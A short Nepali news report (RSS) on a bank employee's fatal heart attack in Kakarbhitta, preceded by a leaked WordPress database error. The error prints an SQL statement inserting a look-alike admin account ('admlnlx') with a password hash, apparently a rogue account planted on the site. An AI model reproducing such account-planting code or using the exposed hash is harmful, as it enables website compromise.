WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3cuRnrnmjhmYNyGU5DrN4jOxiT0Lu.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 05:15:52', '', 'admlnlx', 'admlnlx')
काँकडभिट्टा (झापा),माघ ८ –
नेपाल राष्ट्र बैंक काँकडभिट्टा शाखाका कर्मचारीको हृदयाघातका कारण शुक्रबार मृत्यु भएको छ ।
कार्यालय समयमै काम गरिरहेका बेला एक्कासि रिङ्गटा चलेर बेहोस भएका मेचीनगर–१० का ४८ वर्षीय दिवाकर आचार्यको उपचारको क्रममा विर्तामोडस्थित बिएन्डसी हस्पिटलमा मृत्यु भएको हो ।
उनी पाँचाँै तहका कर्मचारी रहेको बैंकका निमित्त प्रमुख सुरेशबहादुर श्रेष्ठले बताउनुभयो । दिउँसो ११ः३० बजे एक्कासि रिङ्गटा चल्यो भन्दै बेहोस भएका दिवाकरलाई उपचारका लागि तत्काल बिएन्डसी हस्पिटल लगिएको थियो ।
उपचारमा संलग्न डाक्टरले अत्यधिक प्रेसर बढेका कारण हृदयाघात भई उनको मृत्यु भएको जनाएको निमित्त प्रमुख श्रेष्ठले बताउनुभयो ।- रासस